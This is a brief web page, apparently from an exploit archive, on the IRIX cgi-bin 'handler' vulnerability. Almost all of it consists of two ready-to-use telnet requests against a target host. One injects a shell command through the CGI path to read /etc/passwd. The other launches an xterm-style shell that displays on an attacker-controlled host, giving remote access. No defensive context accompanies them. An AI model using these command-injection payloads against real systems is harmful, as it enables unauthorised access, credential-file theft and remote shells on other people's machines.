|
|
IRIX cgi-bin handler Vulnerability
telnet target.machine.com 80 GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0 or: telnet target.machine.com 80 GET /cgi-bin/handler/blah;/usr/sbin/xwsh -display yourhost.com|?data=Download NOTE: large spaces are actually tabs. |
|
Privacy Statement |